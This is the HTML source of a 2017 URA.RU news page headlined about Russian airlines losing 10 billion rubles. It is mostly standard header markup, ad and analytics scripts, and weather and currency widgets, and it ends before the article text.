<!DOCTYPE html>
<html ng-app="uraruApp">
<head>
	<title>Российские авиакомпании снова в убытке. За год они потеряли 10 млрд рублей</title>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8;" />
	<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimum-scale=1.0, maximum-scale=1.0"/>
	<META NAME="Keywords" CONTENT="российские авиакомпании убытки, авиакомпании работают в минус, господдержка авиакомпаний, Владимир Тасун убытки авиакомпаний"/>
	<META NAME="Description" CONTENT="Узнайте всё о том, почему авиакомпании в России не могут зарабатывать деньги. Только на URA.RU"/>
	<meta property="og:type" content="article" />
	<meta property="og:title" content="Российские авиакомпании за год потеряли 10 млрд рублей" />
	<meta property="og:url" content="https://ura.news/news/1052292262" />
	<meta property="og:description" content="Ситуацию в отрасли не спасает даже господдержка" />
	<meta property="fb:app_id" content="204956386294609" />
	<meta property="fb:pages" content="185226544854775" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:site" content="@ura_ru" />
	<meta name="twitter:creator" content="@ura_ru" />
	<meta name="twitter:title" content="Российские авиакомпании за год потеряли 10 млрд рублей" />
	<meta name="twitter:description" content="Ситуацию в отрасли не спасает даже господдержка" />

				<meta property="og:image" content="https://s.ura.news/images/news/upload/smm/2017/06/06/facebook_b703bb90a16bb4fce2e6a97402978fd2.jpg" />
			<meta name="twitter:image" content="https://s.ura.news/images/news/upload/smm/2017/06/06/facebook_b703bb90a16bb4fce2e6a97402978fd2.jpg" />
		
	<meta property="og:image:width" content="1200" />
	<meta property="og:image:height" content="630" />
	<link rel="shortcut icon" href="/favicon.ico?2" type="image/x-icon">
	<link rel="apple-touch-icon" href="/apple-touch-icon.png"/>
    <link rel="apple-touch-icon" sizes="76x76" href="/apple-touch-icon-76x76.png"/>
    <link rel="apple-touch-icon" sizes="120x120" href="/apple-touch-icon-120x120.png"/>
    <link rel="apple-touch-icon" sizes="152x152" href="/apple-touch-icon-152x152.png"/>
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon-180x180.png"/>
	<link rel="alternate" type="application/rss+xml" title="URA.Ru RSS" href="/rss" />
	<link rel="alternate" media="only screen and (max-width: 640px)" href="https://m.ura.news/news/1052292262" />
	<link rel="stylesheet" href="/lib/jquery/jquery-ui-1.11.1.custom/jquery-ui.min.css"/>
	<link rel="stylesheet" href="/lib/jquery/jquery-ui-1.11.1.custom/jquery-ui.structure.min.css"/>
	<link rel="stylesheet" href="/lib/jscrollpane/jquery.jscrollpane.css"/>
	<link rel="stylesheet" href="/css/font.css?v=204"/>
	<link rel="stylesheet" href="/css/all.min.css?v=204"/>
<!--	<script type="text/javascript" src="/js/adfox.asyn.code.ver3.js"></script>
	<script type="text/javascript" src="/js/adfox.asyn.code.scroll.js"> </script>-->
	<script src="https://yastatic.net/pcode/adfox/loader.js"></script>
	<link rel="stylesheet" href="/social-icons/social-likes_flat.min.css">
	<script src="/lib/libs.js"></script>
	<script src="/lib/screentime/screentime.js"></script>
	<script>var IMAGE_PATH = 'https://s.ura.news';</script>
	<script src="/js/all.js?v=204"></script>
	<script type="text/javascript" src="/js/slick/slick.min.js"></script>
	<script type='text/javascript'>
		var googletag = googletag || {};
		googletag.cmd = googletag.cmd || [];
	 	(function() {
	 	var gads = document.createElement('script');
	 	gads.async = true;
	 	gads.type = 'text/javascript';
	 	var useSSL = 'https:' == document.location.protocol;
	 	gads.src = (useSSL ? 'https:' : 'http:') +
	 	'//www.googletagservices.com/tag/js/gpt.js';
	 	var node = document.getElementsByTagName('script')[0];
	 	node.parentNode.insertBefore(gads, node);
	 	})();
	</script>
	<!-- Facebook Pixel Code -->
	<script>
		!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
			n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;
			n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
			t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
			document,'script','https://connect.facebook.net/en_US/fbevents.js');

		fbq('init', '1436811319895604');
		fbq('track', "PageView");</script>
	<noscript><img height="1" width="1" style="display:none"
				   src="https://www.facebook.com/tr?id=1436811319895604&ev=PageView&noscript=1"
			/></noscript>
	<!-- End Facebook Pixel Code -->

	
	<script type="text/javascript" async src="https://relap.io/api/v6/head.js?token=cFQt-vx4fYB9YWRh"></script>
	
</head>
<body>
<div id="fb-root"></div>
<script>(function(d, s, id) {
		var js, fjs = d.getElementsByTagName(s)[0];
		if (d.getElementById(id)) return;
		js = d.createElement(s); js.id = id;
		js.src = "//connect.facebook.net/ru_RU/sdk.js#xfbml=1&appId=1379637825594264&version=v2.0";
		fjs.parentNode.insertBefore(js, fjs);
	}(document, 'script', 'facebook-jssdk'));</script>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script>
<div ng-controller="UserCtrl" style="height: 100%;">
	<div id="content_block" style="height: 100%;">
		
		

	<div id="top_banner_A" style="height:130px; width:100%;">
		<div>
			<!--AdFox START-->
			<!--uraru-->
			<!--Площадка: ura.ru / Все страницы / A1_130px-->
			<!--Категория: <не задана>-->
			<!--Тип баннера: A_100%x130-->
			<div id="adfox_1488181690906912"></div>
			<script>
				window.Ya.adfoxCode.create({
					ownerId: 227654,
					containerId: 'adfox_1488181690906912',
					params: {
						p1: 'buudz',
						p2: 'fjcz'
					}
				});
			</script>
		</div>
	</div>
	<style>
		body{
			margin-top: 230px;
		}
		body.trans:before{
			height: 230px;
		}
		.header{
			top: 130px;
		}
		.wrapper{
			top: 230px;
		}
		.wrapper.wrapper-archive{
			top: 280px;
		}
		.wrapper-archive>.scroll{
			bottom: 280px;
		}
		.scroll{
			top: 0;
			bottom: 230px;
		}
		.wrapper-story {
			top: 380px;
		}
		.wrapper-story>.scroll {
			bottom: 380px;
		}
		.archive-left{
			top: 280px;
		}
		.list-title{
			top: 230px;
		}
		.list-title-border{
			top: 279px;
		}
		.scroll-story-title{
			top: 230px;
		}
		.bannerA-collapsed{
			margin-top: 100px;
		}
		.bannerA-collapsed #top_banner_A{
			top: -130px;
		}
		.bannerA-collapsed .header{
			top: 0;
		}
		.bannerA-collapsed .content{
			margin-top: 100px;
		}
		.bannerA-collapsed .wrapper{
			top: 100px;
		}
		.bannerA-collapsed .wrapper-archive{
			top: 150px;
		}
		.bannerA-collapsed .scroll{
			top: 0;
			bottom: 100px;
		}
		.bannerA-collapsed .wrapper-story {
			top: 250px;
		}
		.bannerA-collapsed .wrapper-story>.scroll {
			bottom: 250px;
		}
		.bannerA-collapsed .archive-left{
			top: 150px;
		}
		.bannerA-collapsed .list-title{
			top: 100px;
		}
		.bannerA-collapsed .list-title-border{
			top: 149px;
		}
		.bannerA-collapsed .scroll-story-title{
			top: 100px;
		}
		#popup_body {
			top: 130px;
		}
	/*	.collapsed .list-title-border {
			top: 100px !important;
		}
		.collapsed .list-title {
			top: 150px !important;
		}
		.collapsed .scroll-story-title {
			top: 150px !important;
		}
	*/
		.scroll-story-description {
			top: 230px !important;
		}
		.bannerA-collapsed .scroll-story-description {
			top: 100px !important;
		}
		.collapsed .scroll-story-description {
			top: 50px !important;
		}
	</style>



<div class="header">
	<div class="hback"></div>
	<div class="htop">
		<div class="region-menu"><ul><li></li><li class="spc gr0 active" data-group="0"><a href="/" ng-click="changeRegion('')">&nbsp;</a></li><li class=" gr0 active" data-group="0"><a href="/" ng-click="changeRegion('')">Все&nbsp;регионы</a></li><li class="spc gr0 active" data-group="0"><a href="/" ng-click="changeRegion('')">&nbsp;</a></li><li class="spc gr1" data-group="1"><a href="/msk" ng-click="changeRegion('msk')">&nbsp;</a></li><li class=" gr1" data-group="1"><a href="/msk" ng-click="changeRegion('msk')">Москва</a></li><li class="spc gr1" data-group="1"><a href="/msk" ng-click="changeRegion('msk')">&nbsp;</a></li><li class="spc gr2" data-group="2"><a href="/svrd" ng-click="changeRegion('svrd')">&nbsp;</a></li><li class=" gr2" data-group="2"><a href="/svrd" ng-click="changeRegion('svrd')">Свердловская&nbsp;обл.</a></li><li class="spc gr2" data-group="2"><a href="/svrd" ng-click="changeRegion('svrd')">&nbsp;</a></li><li class="spc gr3" data-group="3"><a href="/chel" ng-click="changeRegion('chel')">&nbsp;</a></li><li class=" gr3" data-group="3"><a href="/chel" ng-click="changeRegion('chel')">Челябинская&nbsp;обл.</a></li><li class="spc gr3" data-group="3"><a href="/chel" ng-click="changeRegion('chel')">&nbsp;</a></li><li class="spc gr4" data-group="4"><a href="/kurgan" ng-click="changeRegion('kurgan')">&nbsp;</a></li><li class=" gr4" data-group="4"><a href="/kurgan" ng-click="changeRegion('kurgan')">Курганская&nbsp;обл.</a></li><li class="spc gr4" data-group="4"><a href="/kurgan" ng-click="changeRegion('kurgan')">&nbsp;</a></li><li class="spc gr5" data-group="5"><a href="/tumen" ng-click="changeRegion('tumen')">&nbsp;</a></li><li class=" gr5" data-group="5"><a href="/tumen" ng-click="changeRegion('tumen')">Тюменская&nbsp;обл.</a></li><li class="spc gr5" data-group="5"><a href="/tumen" ng-click="changeRegion('tumen')">&nbsp;</a></li><li class="spc gr6" data-group="6"><a href="/khanti" ng-click="changeRegion('khanti')">&nbsp;</a></li><li class=" gr6" data-group="6"><a href="/khanti" ng-click="changeRegion('khanti')">Югра</a></li><li class="spc gr6" data-group="6"><a href="/khanti" ng-click="changeRegion('khanti')">&nbsp;</a></li><li class="spc gr7" data-group="7"><a href="/yamal" ng-click="changeRegion('yamal')">&nbsp;</a></li><li class=" gr7" data-group="7"><a href="/yamal" ng-click="changeRegion('yamal')">Ямал</a></li><li class="spc gr7" data-group="7"><a href="/yamal" ng-click="changeRegion('yamal')">&nbsp;</a></li><li class="spc gr8" data-group="8"><a href="/perm" ng-click="changeRegion('perm')">&nbsp;</a></li><li class=" gr8" data-group="8"><a href="/perm" ng-click="changeRegion('perm')">Пермский&nbsp;край</a></li><li class="spc gr8" data-group="8"><a href="/perm" ng-click="changeRegion('perm')">&nbsp;</a></li><li></li></ul></div>
		
			<a href="/" class="logo" id="logo" ng-click="changeRegion('')"><img src="/img/blank.png" alt="Российское информационное агенство URA.RU"></a>

		
		<div id="user_block">
	<div ng-cloak>
		<div id="header_search_btn" class="h-sep" ng-click="searchPanel.toggle()" ng-class="{'active': searchPanel.visible}"></div>
		<div id="header_search_form" ng-show="searchPanel.visible">
			<div class="form form-a">
				<div class="form-pad">
					<button class="btn" id="header_search_submit" ng-click="searchPanel.submit()">искать</button>
					<input type="text" id="header_search_input" ng-model="searchPanel.q" on-enter="searchPanel.submit()"/>
					<div class="clear"></div>
				</div>
			</div>
		</div>

		<div id="notification_btn" class="h-sep" ng-class="{'disabled': user.notifications_count == 0, 'notification-btn-push': push_supported && push_notifications_allow!=1}" ng-click="showNotifications($event)">
			<span ng-if="(!push_supported && user.notifications_count) || (push_supported && push_notifications_allow==1 && user.notifications_count)">{{user.notifications_count}}</span>
			<span ng-if="push_supported && push_notifications_allow!=1">{{(user.notifications_count+1)}}</span>
		</div>

		<div ng-if="user.is_auth && !user.is_anonymous">
			<div id="profile_btn" ng-click="settingsPanel.show()" class="bg-cover" style="background-image: url('{{user.img}}')"></div>
			<div id="logout_btn" ng-click="logout()">Выйти</div>
		</div>
		<div id="login_btn" class="h-sep" ng-click="loginPanel.toggleTop()" ng-class="{active: loginPanel.visible_top}" ng-if="!user.is_auth || user.is_anonymous">Войти</div>

		<div ng-show="loginPanel.visible_top" ng-include="'login_panel.html'"></div>

		<div class="panel panel-top" ng-show="notificationsPanel.visible">
			<div id="push_tab" ng-show="notificationsPanel.tabs.notifications.visible">
				<div ng-if="push_supported && push_notifications_allow==1" class="form form-a form-pad" style="border-radius: 0;border-bottom: 0;">
					<div style="margin-bottom: 12px;">Новости приходят чаще, чем вам хотелось бы, а поводы не интересны?</div>
					<a href="https://ura.news/push/" onclick="ga('send', 'event', 'Личный кабинет', 'Переход к настройке Push', window.location.href);" class="btn">настроить уведомления</a>
				</div>
				<div ng-if="push_supported && push_notifications_allow!=1" class="form-blue">
					<div style="margin-bottom: 12px;">URA.RU готово сообщать вам новости, на каком бы сайте вы ни находились</div>
					<a href="https://ura.news/push/" onclick="ga('send', 'event', 'Личный кабинет', 'Переход к подписке на Push', window.location.href);" class="btn btn-radius btn-upper"  style="line-height: 25px;display: inline-block;padding: 0 20px;">подписаться на уведомления</a>
				</div>
			</div>
			<div id="notifications_tab" class="form form-b" ng-show="notificationsPanel.tabs.notifications.visible">
				<div ng-if="user.notifications_count">у вас {{user.notifications_count}} новых уведомления</div>
				<div ng-if="user.is_anonymous">Вы не зарегистрированы. <span class="btn-link" ng-click="loginPanel.toggleTop()">Войдите в свой профиль</span>, чтобы использовать уведомления в полную силу</div>
				<div class="btn-link" ng-click="notificationsPanel.showTab('subs')" ng-if="!user.is_anonymous">Редактировать подписки</div>
				<div class="noti-scroll">
					<div class="trapScroll">
						<div class="noti noti-icon" ng-repeat="n in user.notifications" ng-click="read(n.id, n.link)" ng-class="n.class">
							<div ng-bind-html="n.text"></div>
						</div>
					</div>
				</div>
				<div class="checkbox checkbox-digest" ng-click="toggleUserMailDigest()" ng-class="{'checked':user.mail_digest==1}" ng-if="!user.is_anonymous"></div>
			</div>
			<div id="subscriptions_tab" class="form form-b" ng-show="notificationsPanel.tabs.subs.visible">
				<div style="margin-bottom: 10px;">Редактирование подписок</div>
				<div class="btn-group">
					<div class="btn-s" ng-class="{active: notificationsPanel.tabs.subs.tabs.comment.visible}" ng-click="notificationsPanel.tabs.subs.showTab('comment')">Комментарии</div>
					<div class="btn-s" ng-class="{active: notificationsPanel.tabs.subs.tabs.author.visible}" ng-click="notificationsPanel.tabs.subs.showTab('author')">Авторы</div>
					<div class="btn-s" ng-class="{active: notificationsPanel.tabs.subs.tabs.story.visible}" ng-click="notificationsPanel.tabs.subs.showTab('story')">Сюжеты</div>
				</div>
				<div id="panel_subtabs" class="noti-scroll">
					<div class="trapScroll" ng-show="notificationsPanel.tabs.subs.tabs.comment.visible">
						<div ng-repeat="s in user.subs_by_type['comment']" class="noti noti-icon noti-comment">
							<div ng-click="unsubscribe(s.type, s.real_id)" class="btn-s">отписаться</div>
							<div ng-bind-html="s.title"></div>
						</div>
					</div>
					<div class="trapScroll" ng-show="notificationsPanel.tabs.subs.tabs.author.visible">
						<div ng-repeat="s in user.subs_by_type['author']" class="noti noti-icon noti-author">
							<div ng-click="unsubscribe('author', s.real_id)" class="btn-s">отписаться</div>
							<div ng-bind-html="s.title"></div>
						</div>
					</div>
					<div class="trapScroll" ng-show="notificationsPanel.tabs.subs.tabs.story.visible">
						<div ng-repeat="s in user.subs_by_type['story']" class="noti noti-icon noti-news">
							<div ng-click="unsubscribe('story', s.real_id)" class="btn-s">отписаться</div>
							<div ng-bind-html="s.title"></div>
						</div>
					</div>
				</div>
			</div>
		</div>

		<div class="panel panel-top" ng-show="settingsPanel.visible">
			<div class="form form-a form-hor">
				<div class="form-pad">
					<div class="error">{{settingsPanel.errors.form}}</div>
					<span class="error">{{settingsPanel.errors.name}}</span>
					<label for="name" class="flex" ng-class="{'error':settingsPanel.errors.name}">
						<span class="label" style="width:40px;">имя</span>
						<input id="name" type="text" value="111" ng-model="settingsPanel.data.name" ng-disabled="settingsPanel.changePassword"/>
					</label>
					<div style="line-height: 25px;float: left;">
						<button class="btn-link" ng-class="{'active':settingsPanel.changePassword}" ng-click="settingsPanel.toggleChangePassword()">сменить пароль</button>
					</div>
					<button class="btn btn-send" style="float:right;" ng-click="settingsPanel.save()">сохранить</button>
					<div class="clear"></div>
				</div>
				<div class="form-pad" ng-show="settingsPanel.changePassword">
					<span class="error">{{settingsPanel.errors.new_password}}</span>
					<label for="new_pass1" class="flex" ng-class="{'error':settingsPanel.errors.new_password}">
						<span class="label" style="width:100px;">новый пароль</span>
						<input id="new_pass1" type="password" ng-model="settingsPanel.data.new_password"/>
					</label>
					<label for="new_pass2" class="flex" ng-class="{'error':settingsPanel.errors.new_password}">
						<span class="label" style="width:100px;padding-top:3px;">повторите новый пароль</span>
						<input id="new_pass2" type="password" ng-model="settingsPanel.data.new_password2"/>
					</label>
					<label for="old_pass" class="flex" ng-class="{'error':settingsPanel.errors.password}">
						<span class="label" style="width:100px;">старый пароль</span>
						<input id="old_pass" type="password" ng-model="settingsPanel.data.password"/>
					</label>
					<button class="btn btn-send" style="float:right;" ng-click="settingsPanel.saveChangePassword()">сохранить</button>
					<div class="clear"></div>
				</div>
				<div class="form-bottom form-pad">
					<button class="btn" style="float:left;" ng-click="logout()">выйти</button>
					<div class="clear"></div>
				</div>
			</div>
		</div>

	</div>

	
	
<style>
	#push_notifications {
		bottom: 0;
		right: 0;
		background-color: rgba(0,57,166,0.9);
		z-index: 10000;
		position: absolute;
		width: 400px;
		height: 100%;
		top: 50px;
		left: -200px;
	}
	#push_notifications_close{
		width: 54px;
		height: 50px;
		background: url(https://s.ura.news/img/nw/login-close2.png) center no-repeat;
		background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAATCAYAAAEFVwZaAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAL5JREFUeNpiYLBc9p4BBVgu+48hABBADLgBQAARoQYqCRBA2CRItpsY1wEEEGEnYZVDFiToZ5ACkj2NIobheayGvAcIIBCRQEBRAhOMgUsBKgddITYxFEE0BYxYjLcH4oMMx6MWwISZGIgATBiOPB6ViN0zBBzOiGTCAtxBQERgAgQYzKT5QJyI1TTC0YbQj+bW/wRdQJJ6QopItRSrJrIMwTR0PtSQ+cQnClwugyQ1RjBNsfdoEvBEqKdqOgMAd0GNoNBDsG4AAAAASUVORK5CYII=');
		position: absolute;
		top: -50px;
		right: 90px;
		padding: 0;
		cursor: pointer;
		background-color: #ffffff;
	}
	#push_notifications_close:before{
		width: 0;
		height: 0;
		border-left: 12px solid transparent;
		border-right: 12px solid transparent;
		border-bottom: 10px solid rgba(0,57,166,1);
		display: block;
		content: '';
		top: 40px;
		position: relative;
		left: 15px;
	}
	#push_notifications_content{
		position: relative;
		color: #ffffff;
		margin: 0 auto;
		background-color: rgba(0,57,166,1);
		width: auto;
		top: 0;
		padding: 26px 29px 29px;
	}
	#push_notifications_message{
		background-color: #ffffff;
		color: #000000;
		margin: 15px 0;
		/*background-image: url(/img/ura64.png);*/
		background-image: url('data:image/png;base64,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');
		background-repeat: no-repeat;
		background-position: 2px 2px;
		padding: 8px 2px 2px 86px;
		min-height: 68px;
		box-sizing: border-box;
	}
	#push_notifications_cancel{
		cursor: pointer;
		display: inline-block;
		height: 40px;
		line-height: 40px;
		float: right;
	}
	#push_notifications_ok{
		background: #ffffff;
		color: rgb(0,57,166);
		cursor: pointer;
		display: inline-block;
		border-radius: 4px;
		height: 40px;
		line-height: 40px;
		padding: 0 15px;
		min-width: 122px;
		text-align: center;
		box-sizing: border-box;
	}
	#notification_btn.notification-btn-push>span{
		background-color: #e93c4f;
	}
</style>
<div id="push_notifications" style="display: none;">
	<div id="push_notifications_close" onclick="ga('send', 'event', 'Промо FullScreen Push', 'Закрыть промо подписки на Push', window.location.href);"></div>
	<div id="push_notifications_content">
		<div id="push_notifications_title">URA.RU готово сообщать вам новости, на каком бы сайте вы ни находились</div>
		<div id="push_notifications_message" style="line-height:18px;">
			По версии следствия, через него экс-губернатор получил 3,4 млрд рублей.		</div>
		<div id="push_notifications_ok" onclick="ga('send', 'event', 'Промо FullScreen Push', 'Переход к подписке на Push', window.location.href);">Подписаться</div>
		<div id="push_notifications_cancel" onclick="ga('send', 'event', 'Промо FullScreen Push', 'Отказ от подписки на Push', window.location.href);">Не подписываться</div>
	</div>
</div>
	
</div>
		<div class="header-zagl">
			<div class="header-zagl-weather header-zagl-weather_no_data">
    
    <span class="header-zagl-weather_icon"
          title=""></span>
    <span class="header-zagl-weather_city">Москва</span>
    <span class="header-zagl-weather_value"></span>

    <script type="text/javascript">

        $.ajax(
            '/widgets/weather/load_weather.php',
            {
                cache:      true,
                type:       'get',
                dataType:   'json',
                data:       {
                    lat:    55.7558,
                    lon:    37.6176,
                    width:  455                },
                success:    function(data){

                    $('.header-zagl-weather_icon').addClass('header-zagl-weather_icon_'+data['weather'][0]['icon']);
                    $('.header-zagl-weather_icon').attr('title', data['weather'][0]['description']);
                    if (typeof data['main']['temp'] == 'undefined' || data['main']['temp'] === NaN) {
                        $('.header-zagl-weather_value').html(data['days_content'][0]['temp']);
                    } else {
                        $('.header-zagl-weather_value').html((data['main']['temp']>0 ? '+' : '') + Math.round(data['main']['temp']) + '&deg;');
                    }
//                    $('.header-zagl-weather_value').html((data['main']['temp']>0 ? '+' : '') + Math.round(data['main']['temp']) + '&deg;');
                    $('.header-zagl-weather').removeClass('header-zagl-weather_no_data');

                    $('.forecast .curve')
                        .css({background:'url(data:image/svg+xml;base64,'+data['graph_line']+') no-repeat'});

                    $('.forecast .day').each((function(data){return function(day_num, el){

                        var day = $(el);

                        var backgrounds = [
                            'url(data:image/svg+xml;base64,'+data['graph_dots']+') '+(-65*day_num)+'px 0 no-repeat',
                            'url(/img/weather_icon/white/'+data['days_content'][day_num]['icon']+'.svg) center 24px / 50% auto no-repeat',
//                            'url(http://ura.ru/img/weather_icon/4.png) '+(//*day_num)+'px 0 no-repeat'
                        ];

                        var content = [
                            '<span class="day-date">'+ data['days_content'][day_num]['date'] +'</span>',
                            '<span class="day-temp">'+ data['days_content'][day_num]['temp'] +'</span>'
                        ];

                        $(el)
                            .html(content.join(''))
                            .css({background:backgrounds.join(',')});

                    };})(data));
                }
            }
        );

    </script>

    <div class="forecast">
        <div class="forecast_title">прогноз на 7 дней</div>
        <div class="days">
                            <div class="day day_0" style="background-position: 0px 0px;"></div>
                            <div class="day day_1" style="background-position: -65px 0px;"></div>
                            <div class="day day_2" style="background-position: -130px 0px;"></div>
                            <div class="day day_3" style="background-position: -195px 0px;"></div>
                            <div class="day day_4" style="background-position: -260px 0px;"></div>
                            <div class="day day_5" style="background-position: -325px 0px;"></div>
                            <div class="day day_6" style="background-position: -390px 0px;"></div>
                        <div class="clear"></div>
        </div>
        <div class="curve"></div>
    </div>

</div>
			
        <div class="header-zagl-usd course_block">
        <span class="header-zagl-course_name"><span>Доллар</span></span>
        <span class="header-zagl-course header-zagl-course_down">
	56,62        </span>
                <div class="USD_course_graph course_graph" style="background-image: url('data:image/svg+xml;base64,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');"><div class="forecast_title">Динамика за 2 недели</div>
            <div style="background:url(data:image/svg+xml;base64,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);"
                 class="points" ></div>
            <div style="background:url(data:image/svg+xml;base64,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);"
                 class="curve" ></div>
            <script type="application/ecmascript">// <![CDATA[
var tooltipOn='', initfns=['ttEvt'], tips={e7:'2017-05-24, 56,5552',e8:'2017-05-25, 56,2743',e9:'2017-05-26, 56,0701',ea:'2017-05-27, 56,756',eb:'2017-05-28, 56,756',ec:'2017-05-29, 56,756',ed:'2017-05-30, 56,7106',ee:'2017-05-31, 56,5168',ef:'2017-06-01, 56,6876',eg:'2017-06-02, 56,5373',eh:'2017-06-03, 56,6876',ei:'2017-06-04, 56,6876',ej:'2017-06-05, 56,6876',ek:'2017-06-06, 56,6152',ep:'2017-05-24, 56,5552',eq:'2017-05-25, 56,2743',er:'2017-05-26, 56,0701',es:'2017-05-27, 56,756',et:'2017-05-28, 56,756',eu:'2017-05-29, 56,756',ev:'2017-05-30, 56,7106',ew:'2017-05-31, 56,5168',ex:'2017-06-01, 56,6876',ey:'2017-06-02, 56,5373',ez:'2017-06-03, 56,6876',e10:'2017-06-04, 56,6876',e11:'2017-06-05, 56,6876',e12:'2017-06-06, 56,6152'};
function getE(i){return document.getElementById(i)}
function setattr(i,a,v){i.setAttributeNS(null,a,v);return v}
function newel(e,a){
  var ns='http://www.w3.org/2000/svg', ne=document.createElementNS(ns,e),i;
  for(i in a)
    setattr(ne, i, a[i]);
  return ne;
}
function showhide(e,h){setattr(e,'visibility',h?'visible':'hidden');}
function svgNode(e) {
  var d = e.target.correspondingUseElement || e.target, nn = 'svg';
  while(d.parentNode && d.nodeName != nn)
    d = d.parentNode;
  return d.nodeName == nn ? d : null;
}
function svgCursorCoords(e) {
  var d = svgNode(e), pt;
  if(!d || !d.createSVGPoint || !d.getScreenCTM) {
    return [e.clientX,e.clientY];
  }
  pt = d.createSVGPoint(); pt.x = e.clientX; pt.y = e.clientY;
  pt = pt.matrixTransform(d.getScreenCTM().inverse());
  return [pt.x,pt.y];
}
function tooltip(e,callback,on,param) {
  var tt = getE('tooltip'), rect = getE('ttrect'), shadow = getE('ttshdw'),
    offset = 10, pos = svgCursorCoords(e),
    x = pos[0] + offset, y = pos[1] + offset, inner, brect, bw, bh,
    sw, sh,
    de = svgNode(e);
  if(on && !tt) {
    tt = newel('g',{id:'tooltip',visibility:'visible'});
    rect = newel('rect',{
      stroke: 'black',
      'stroke-width': '1px',
      fill: '#ffffcc',
      width:'10px',height:'10px',
      id: 'ttrect',
      rx:'0px',ry:'0px'
    });
    shadow = newel('rect',{
      fill: '#000',
      opacity: 0.3,
      x:'1.5px',y:'1.5px',
      width:'10px',height:'10px',
      id: 'ttshdw',
      rx:'0px',ry:'0px'
    });
    tt.appendChild(shadow);
    tt.appendChild(rect);
  }
  if(tt) {
    if(on) {
      if(tt.parentNode && tt.parentNode != de)
        tt.parentNode.removeChild(tt);
      de.appendChild(tt);
    }
    showhide(tt,on);
  }
  inner = callback(e,tt,on,param);
  if(inner && on) {
    brect = inner.getBBox();
    bw = Math.ceil(brect.width + 6);
    bh = Math.ceil(brect.height + 6);
    setattr(rect, 'width', bw + 'px');
    setattr(rect, 'height', bh + 'px');
    setattr(inner, 'transform', 'translate(' + (bw / 2) + ',0)');
    if(shadow) {
      setattr(shadow, 'width', (bw + 1) + 'px');
      setattr(shadow, 'height', (bh + 1) + 'px');
    }
    if(bw + x > 469.5) {
      x -= bw + offset * 2;
      x = Math.max(x, 0);
    }
    if(bh + y > 246.5) {
      y -= bh + offset * 2;
      y = Math.max(y, 0);
    }
  }
  on && setattr(tt,'transform','translate('+x+' '+y+')');
  tooltipOn = on ? 1 : 0;
}
function newtext(c){return document.createTextNode(c)}
function texttt(e,tt,on,t){
  var ttt = getE('tooltiptext'), lines, i, ts, xpos;
  if(on) {
    lines = t.split('\\n');
    xpos = '3px';
    if(!ttt) {
      ttt = newel('g', {
        id: 'tooltiptext',
        fill: 'black',
        'font-size': '10px',
        'font-family': 'sans-serif',
        'font-weight': 'normal',
        'text-anchor': 'middle'
      });
      tt.appendChild(ttt);
    }
    while(ttt.childNodes.length > 0)
      ttt.removeChild(ttt.childNodes[0]);
    for(i = 0; i < lines.length; ++i) {
      ts = newel('text', { y: (13 * (i + 1)) + 'px' });
      ts.appendChild(newtext(lines[i]));
      ttt.appendChild(ts);
    }
  }
  ttt && showhide(ttt,on);
  return ttt;
}
function finditem(e,list) {
  var l = e.target.correspondingUseElement || e.target, t;
  while(!t && l.parentNode) {
    t = l.id && list[l.id]
    l = l.parentNode;
  }
  return t;
}
function init() {
  if(!document.addEventListener || !initfns)
    return;
  for(var f in initfns)
    eval(initfns[f] + '()');
}
function ttEvt() {
  document.addEventListener && document.addEventListener('mousemove',
    function(e) {
      var t = finditem(e,tips);
      if(t || tooltipOn)
        tooltip(e,texttt,t,t);
    },false);
}

setTimeout(function(){init()},20);

// ]]></script>
        </div>
    </div>
        <div class="header-zagl-eur course_block">
        <span class="header-zagl-course_name"><span>Евро</span></span>
        <span class="header-zagl-course header-zagl-course_up">
	63,81        </span>
                <div class="EUR_course_graph course_graph" style="background-image: url('data:image/svg+xml;base64,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');"><div class="forecast_title">Динамика за 2 недели</div>
            <div style="background:url(data:image/svg+xml;base64,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);"
                 class="points" ></div>
            <div style="background:url(data:image/svg+xml;base64,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);"
                 class="curve" ></div>
            <script type="application/ecmascript">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</script>
        </div>
    </div>
		</div>
		<div class="nw-subs h-sep">
			<span class="nw-subs-title">Подпишись&nbsp;на&nbsp;ura.ru:</span>
			<div class="nw-icons">
				<a class="icons icons-mail" id="email_subscribe" ng-click="email_subscribe.toggle()" ng-class="{'active':email_subscribe.visible}"></a>
				<a class="icons icons-rss" href="/rss" target="_blank"></a>
				<a class="icons icons-vk" href="http://vk.com/ura_ru" target="_blank"></a>
				<a class="icons icons-tw" href="https://twitter.com/ura_ru" target="_blank"></a>
				<a class="icons icons-fb" href="https://www.facebook.com/riauraru" target="_blank"></a>
				<a class="icons icons-ok" href="http://ok.ru/uraru" target="_blank"></a>
				<a class="icons icons-google" href="https://plus.google.com/+uraru" target="_blank"></a>
			</div>
			<div class="panel" ng-show="email_subscribe.visible" ng-cloak style="position: absolute;z-index: 3013;" id="email_subscribe_form">
				<div class="form form-a form-hor">
					<div class="form-pad" ng-if="!email_subscribe.success">
						<div class="label">Чтобы подписаться на рассылку, укажите свой e-mail</div>
						<div class="error">{{email_subscribe.errors.email}}</div>
						<input type="text" style="width: 356px;margin: 5px 0 10px;" ng-model="email_subscribe.data.email" ng-class="{'error':email_subscribe.errors.email}"/>
						<button class="btn" style="float: right" ng-click="email_subscribe.submit()">подписаться</button>
						<div class="clear"></div>
					</div>
					<div class="form-pad" ng-if="email_subscribe.success">
						{{email_subscribe.msg}}
					</div>
				</div>
			</div>
		</div>
	</div>
</div>


		
		
<table class="content" ng-controller="ListCtrl">
	<tr>
		<td class="cl-left">
			
			
<div class="wrapper">
	<div class="scroll" id="scroll" when-scrolled="loadMore()">
